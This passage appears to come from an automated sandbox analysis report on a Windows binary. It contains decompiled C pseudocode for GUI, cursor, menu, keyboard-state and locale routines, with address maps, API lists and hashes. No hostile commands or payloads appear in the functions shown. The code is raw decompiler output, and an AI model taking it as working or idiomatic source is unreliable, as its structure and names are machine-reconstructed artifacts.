                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FocusRect$DrawFill
                                                                        • String ID:
                                                                        • API String ID: 3476037706-0
                                                                        • Opcode ID: bd1cc9d83fbb64b7a4748703e1cad8a8f26c1da09dfb4c53e68ded7458c0d174
                                                                        • Instruction ID: 2e9b2cd7af3be85b1ad5ab87c8741589f721a3b3221bc1c176d7526e71f5910d
                                                                        • Opcode Fuzzy Hash: bd1cc9d83fbb64b7a4748703e1cad8a8f26c1da09dfb4c53e68ded7458c0d174
                                                                        • Instruction Fuzzy Hash: 83916F34A00145CFCB10EF68C485EAEB7F5BF99314F2445BAE5849B326E738AC45CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004344BC, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E004344BC(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x496ba8 != 0) {
					L3:
					_t49 =  *0x496b88; // 0x0
					_t50 =  *0x496b88; // 0x0
					_t117 = E0043439C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x496ba8 == 0) {
						_t168 =  *0x496bac;
						if( *0x496bac != 0) {
							_t106 =  *0x496b9c; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x496bac; // 0x0
							E0043E5DC(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x496b88; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x496ba8;
						_t6 =  &_v24;
						 *_t6 =  *0x496ba8 != 0;
						__eflags =  *_t6;
						 *0x496ba8 = 2;
					} else {
						 *0x496ba8 = 1;
						_v24 = 0;
					}
					_t54 =  *0x496b8c; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x496b8c; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x496b8c; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x496b8c; // 0x0
							E004360F0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x496b8c; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E004343EC(2);
						_t121 =  *_t155;
						_t60 =  *0x496b8c; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x496bac != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x496bac; // 0x0
								E0043E598(_t82, _t158);
								_t84 =  *0x496bac; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x496bac; // 0x0
									E0043E6C4(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x496bac; // 0x0
									E0043E5DC(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x496bac; // 0x0
								E0043E738(_t91, _t131, __eflags);
								_t93 =  *0x495c2c; // 0x496c08
								SetCursor(E0045469C( *_t93, _t158));
							}
						}
						_t62 =  *0x495c2c; // 0x496c08
						_t65 = SetCursor(E0045469C( *_t62, _t158));
						if( *0x496ba8 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00434428(_t121);
								_t67 =  *0x496b8c; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E004360F0(_t118,  &_v24, _t155);
									_t65 = E004037D8(_t118, __eflags);
									_t135 =  *0x496b8c; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x496b8c; // 0x0
									_t65 = E004037D8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x496b8c; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x496b8c; // 0x0
								_t65 = E004037D8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x496b8c == 0) {
								goto L32;
							} else {
								_t119 =  *0x496b8c; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408514(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x496b8c; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x496b8c; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x496b8c; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E004343EC(1);
					if( *0x496b8c == 0) {
						goto L32;
					}
					_t102 =  *0x496b8c; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x496b8c; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x496b8c; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E004343EC(0);
					if( *0x496b8c == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x496b98; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x496ba4; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x496b9c; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x496ba4; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                                        0x004344c2
                                                                        0x004344cb
                                                                        0x004344fa
                                                                        0x004344fa
                                                                        0x00434500
                                                                        0x00434516
                                                                        0x0043451f
                                                                        0x00434521
                                                                        0x00434528
                                                                        0x0043452a
                                                                        0x00434530
                                                                        0x0043453d
                                                                        0x00434542
                                                                        0x00434542
                                                                        0x00434528
                                                                        0x00434547
                                                                        0x00434553
                                                                        0x00434563
                                                                        0x0043456a
                                                                        0x0043456a
                                                                        0x0043456a
                                                                        0x0043456f
                                                                        0x00434555
                                                                        0x00434555
                                                                        0x0043455c
                                                                        0x0043455c
                                                                        0x00434576
                                                                        0x0043457e
                                                                        0x004345cb
                                                                        0x004345cb
                                                                        0x004345d2
                                                                        0x004345d8
                                                                        0x004345db
                                                                        0x004345e4
                                                                        0x004345ec
                                                                        0x004345f4
                                                                        0x004345f9
                                                                        0x00434602
                                                                        0x00434609
                                                                        0x00434609
                                                                        0x00434617
                                                                        0x00434619
                                                                        0x0043461b
                                                                        0x00434625
                                                                        0x0043462e
                                                                        0x00434632
                                                                        0x0043463c
                                                                        0x00434641
                                                                        0x00434646
                                                                        0x0043464b
                                                                        0x0043464f
                                                                        0x0043466a
                                                                        0x0043466f
                                                                        0x00434674
                                                                        0x00434651
                                                                        0x00434655
                                                                        0x0043465c
                                                                        0x0043465e
                                                                        0x00434663
                                                                        0x00434663
                                                                        0x0043467b
                                                                        0x0043467b
                                                                        0x00434680
                                                                        0x00434688
                                                                        0x00434695
                                                                        0x00434695
                                                                        0x00434632
                                                                        0x0043469d
                                                                        0x004346aa
                                                                        0x004346b6
                                                                        0x00434789
                                                                        0x00434789
                                                                        0x004346bc
                                                                        0x004346bc
                                                                        0x004346be
                                                                        0x004346df
                                                                        0x004346e1
                                                                        0x004346e6
                                                                        0x004346e9
                                                                        0x004346eb
                                                                        0x00434719
                                                                        0x00434728
                                                                        0x0043472d
                                                                        0x00434733
                                                                        0x004346ed
                                                                        0x004346f5
                                                                        0x00434701
                                                                        0x00434706
                                                                        0x0043470c
                                                                        0x0043470c
                                                                        0x004346c0
                                                                        0x004346c3
                                                                        0x004346c6
                                                                        0x004346d3
                                                                        0x004346d3
                                                                        0x0043473d
                                                                        0x00000000
                                                                        0x0043473f
                                                                        0x0043473f
                                                                        0x00434745
                                                                        0x00434748
                                                                        0x00434750
                                                                        0x00434757
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043475e
                                                                        0x00434760
                                                                        0x00434767
                                                                        0x00434767
                                                                        0x0043476a
                                                                        0x00434771
                                                                        0x00434774
                                                                        0x0043477f
                                                                        0x00434780
                                                                        0x00434781
                                                                        0x00434782
                                                                        0x00000000
                                                                        0x00434782
                                                                        0x0043473d
                                                                        0x004346b6
                                                                        0x00434582
                                                                        0x0043458e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434594
                                                                        0x00434599
                                                                        0x0043459c
                                                                        0x004345a4
                                                                        0x004345a7
                                                                        0x004345ae
                                                                        0x004345b4
                                                                        0x004345b9
                                                                        0x004345c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004345c5
                                                                        0x004344cd
                                                                        0x004344d4
                                                                        0x004344d9
                                                                        0x004344df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004344e1
                                                                        0x004344e9
                                                                        0x004344ec
                                                                        0x004344ee
                                                                        0x004344f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 00434530
                                                                        • GetDesktopWindow.USER32 ref: 00434655
                                                                        • SetCursor.USER32(00000000), ref: 004346AA
                                                                          • Part of subcall function 0043E738: 73451770.COMCTL32(00000000,?,00434685), ref: 0043E754
                                                                          • Part of subcall function 0043E738: ShowCursor.USER32(000000FF,00000000,?,00434685), ref: 0043E76F
                                                                        • SetCursor.USER32(00000000), ref: 00434695
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Cursor$DesktopWindow$73451770Show
                                                                        • String ID:
                                                                        • API String ID: 3513720257-0
                                                                        • Opcode ID: 0908ce388f1a167bea320882a453395eb452e286a3d3486925d54d05bbf51521
                                                                        • Instruction ID: 60a87f57ea885684c14f26adc1ba0dcb8032ffab10c766f9e9c89d1009de8357
                                                                        • Opcode Fuzzy Hash: 0908ce388f1a167bea320882a453395eb452e286a3d3486925d54d05bbf51521
                                                                        • Instruction Fuzzy Hash: 2191AEB42002519FC700DF69D885A46B7E5ABA9318F16D47BE808CB3B2E739FC45CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00459724, Relevance: 6.2, APIs: 4, Instructions: 163windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E00459724(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x459984);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E004591EC(_v8,  &_v528);
					if(E0040A9F8(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
				_v12 = _t133;
				if(E00459504(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E004591EC(_v8,  &_v540);
					_t75 = E00404600(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E004591EC(_v8,  &_v544);
						_v12 = E00404600(_v544);
					}
					E00459700(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E004591EC(_v8,  &_v532);
					if(_t135 < E00404600(_v532)) {
						E004591EC(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0xba6855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E00459700(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x45998b);
						return E0040436C( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x47ac20 + (E004037D8(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x4598f2);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037D8(_v8, _t177);
						SendMessageA(E0043CC2C(_v8), 0x100,  *(0x47ac20 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037D8(_v8, _t177);
						SendMessageA(E0043CC2C(_v8), 0x101,  *(0x47ac20 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x4598f9);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}



























                                                                        0x00459725
                                                                        0x00459727
                                                                        0x00459731
                                                                        0x00459737
                                                                        0x0045973d
                                                                        0x00459743
                                                                        0x00459749
                                                                        0x0045974f
                                                                        0x00459751
                                                                        0x00459756
                                                                        0x00459757
                                                                        0x0045975c
                                                                        0x0045975f
                                                                        0x00459765
                                                                        0x00459770
                                                                        0x00459784
                                                                        0x00459786
                                                                        0x00459786
                                                                        0x00459784
                                                                        0x00459787
                                                                        0x00459794
                                                                        0x00459913
                                                                        0x00459917
                                                                        0x00459919
                                                                        0x0045991b
                                                                        0x0045991b
                                                                        0x00459927
                                                                        0x00459932
                                                                        0x00459937
                                                                        0x0045993a
                                                                        0x00459945
                                                                        0x00459955
                                                                        0x00459955
                                                                        0x00459961
                                                                        0x00000000
                                                                        0x0045979a
                                                                        0x0045979e
                                                                        0x004597a2
                                                                        0x004597a2
                                                                        0x004597a8
                                                                        0x004597b2
                                                                        0x004597c4
                                                                        0x004597cf
                                                                        0x004597e9
                                                                        0x004597ec
                                                                        0x004597ee
                                                                        0x004597ee
                                                                        0x004597ec
                                                                        0x004597f2
                                                                        0x004597f2
                                                                        0x004597fb
                                                                        0x004597fd
                                                                        0x00459800
                                                                        0x00459800
                                                                        0x0045980a
                                                                        0x00459812
                                                                        0x0045990b
                                                                        0x00459966
                                                                        0x00459966
                                                                        0x00459968
                                                                        0x0045996b
                                                                        0x0045996e
                                                                        0x00459983
                                                                        0x00459818
                                                                        0x0045981f
                                                                        0x00459824
                                                                        0x00459829
                                                                        0x0045982f
                                                                        0x0045982f
                                                                        0x00459832
                                                                        0x00459833
                                                                        0x00459833
                                                                        0x00459833
                                                                        0x00459836
                                                                        0x00459854
                                                                        0x00459863
                                                                        0x0045986b
                                                                        0x00459874
                                                                        0x00459875
                                                                        0x0045987a
                                                                        0x0045987d
                                                                        0x00459889
                                                                        0x004598a8
                                                                        0x004598b6
                                                                        0x004598d5
                                                                        0x004598dc
                                                                        0x004598df
                                                                        0x004598e2
                                                                        0x004598e7
                                                                        0x004598ea
                                                                        0x004598f1
                                                                        0x004598f1
                                                                        0x00459812

                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,00459984), ref: 0045981F
                                                                        • SetKeyboardState.USER32(00000081), ref: 00459863
                                                                        • SendMessageA.USER32 ref: 004598A8
                                                                        • SendMessageA.USER32 ref: 004598D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: KeyboardMessageSendState
                                                                        • String ID:
                                                                        • API String ID: 1999190242-0
                                                                        • Opcode ID: fad6d155a161e0a0ec6beaff0b0cd5eee778928cfc5a025ab2d6d9f425fb3a4f
                                                                        • Instruction ID: 0a00c29b07d859761f66e24d50c690cbb1c1765d6d02b1fe706050cb4a926a74
                                                                        • Opcode Fuzzy Hash: fad6d155a161e0a0ec6beaff0b0cd5eee778928cfc5a025ab2d6d9f425fb3a4f
                                                                        • Instruction Fuzzy Hash: 07614D74A00618EFDB10EF69C985ADDB7B4EB59304F2045EAE804A7392D7386F84DB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00450AA0, Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E00450AA0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x450c66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E00449D44(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E0041C2AC(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043CF30(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043CC2C(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043CF30(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043CC2C(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043CF30(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E0043CC2C(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043CC2C(_t92), _t70);
								}
								E00449D44(_t113, E0043CC2C(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00451B60(_t92, 1);
							}
							E004509D8(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x450c6d);
							return E00404348( &_v20);
						}
					}
				}
				_t77 =  *0x496c08; // 0x217094c
				_t79 = E00454224(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x496c08; // 0x217094c
						if(_t113 ==  *((intOrPtr*)(E00454210(_t81, _t111) + 0x248))) {
							_t83 =  *0x496c08; // 0x217094c
							if(_t92 != E00454210(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x495938; // 0x41d7a4
								E00406548(_t87,  &_v20);
								E0040A1B8(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403DA8();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                                        0x00450aa0
                                                                        0x00450aa8
                                                                        0x00450aab
                                                                        0x00450aae
                                                                        0x00450ab0
                                                                        0x00450ab4
                                                                        0x00450ab5
                                                                        0x00450aba
                                                                        0x00450abd
                                                                        0x00450ac2
                                                                        0x00450b34
                                                                        0x00450b34
                                                                        0x00450b3c
                                                                        0x00450b40
                                                                        0x00450b40
                                                                        0x00450b49
                                                                        0x00450b55
                                                                        0x00450b55
                                                                        0x00450b57
                                                                        0x00450b5f
                                                                        0x00450b65
                                                                        0x00450b65
                                                                        0x00450b6c
                                                                        0x00450c1f
                                                                        0x00450c24
                                                                        0x00450c26
                                                                        0x00450c32
                                                                        0x00450c32
                                                                        0x00000000
                                                                        0x00450b85
                                                                        0x00450b8f
                                                                        0x00450b9e
                                                                        0x00450bf8
                                                                        0x00450bff
                                                                        0x00450c03
                                                                        0x00450c08
                                                                        0x00450c0a
                                                                        0x00450c16
                                                                        0x00450c16
                                                                        0x00450c0a
                                                                        0x00000000
                                                                        0x00450bff
                                                                        0x00000000
                                                                        0x00450ba0
                                                                        0x00450ba0
                                                                        0x00450ba9
                                                                        0x00450bb7
                                                                        0x00450bba
                                                                        0x00450bc4
                                                                        0x00450bc9
                                                                        0x00450bcb
                                                                        0x00450bd5
                                                                        0x00450be1
                                                                        0x00450be1
                                                                        0x00450bf1
                                                                        0x00450bf1
                                                                        0x00450c37
                                                                        0x00450c3e
                                                                        0x00450c44
                                                                        0x00450c44
                                                                        0x00450c4b
                                                                        0x00450c52
                                                                        0x00450c55
                                                                        0x00450c58
                                                                        0x00450c65
                                                                        0x00450c65
                                                                        0x00450b8f
                                                                        0x00450b6c
                                                                        0x00450ac4
                                                                        0x00450ace
                                                                        0x00450ad1
                                                                        0x00450ad4
                                                                        0x00450ad7
                                                                        0x00450ad9
                                                                        0x00450adb
                                                                        0x00450aeb
                                                                        0x00450aef
                                                                        0x00450afb
                                                                        0x00450b00
                                                                        0x00450b03
                                                                        0x00450b10
                                                                        0x00450b15
                                                                        0x00450b24
                                                                        0x00450b29
                                                                        0x00450b29
                                                                        0x00450afb
                                                                        0x00450b2e
                                                                        0x00450b2f
                                                                        0x00450b2f
                                                                        0x00450b2f
                                                                        0x00450ad9

                                                                        APIs
                                                                        • GetMenu.USER32(00000000), ref: 00450BC4
                                                                        • SetMenu.USER32(00000000,00000000), ref: 00450BE1
                                                                        • SetMenu.USER32(00000000,00000000), ref: 00450C16
                                                                        • SetMenu.USER32(00000000,00000000,00000000,00450C66), ref: 00450C32
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$LoadString
                                                                        • String ID:
                                                                        • API String ID: 3688185913-0
                                                                        • Opcode ID: 7f759e05d317f3d3ed5b3ef52ee0ca78adf4f75efa92f7d46a79bbff11cb3295
                                                                        • Instruction ID: 93c5ed83d1bbe9563ebe99875d81bd0e706f4a4ab4f057bf17101cf897a6ad90
                                                                        • Opcode Fuzzy Hash: 7f759e05d317f3d3ed5b3ef52ee0ca78adf4f75efa92f7d46a79bbff11cb3295
                                                                        • Instruction Fuzzy Hash: 3751DD34A002449BDB25AFBA89C579E77959F05309F0415BBBC44AB397CA3CEC89C75C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040AE3C, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040AE3C() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x4967f0 = 0x409;
				 *0x4967f4 = 9;
				 *0x4967f8 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x4967f0 = _t14;
				}
				if(_t14 != 0) {
					 *0x4967f4 = _t14 & 0x3ff;
					 *0x4967f8 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x47a0c0, 0x40af90, 8 << 2);
				if( *0x47a0ac != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x4967fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x4967fc = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040ADC4(__eflags, _t49);
					}
				} else {
					_t20 = E0040AE24();
					if(_t20 != 0) {
						 *0x4967fd = 0;
						 *0x4967fc = 0;
						return _t20;
					}
					E0040ADC4(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403120(0x47a0c0, 0x20, 0x40af90);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x4967fc = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x4967fd = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x4967f0; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x4967fd = _t37;
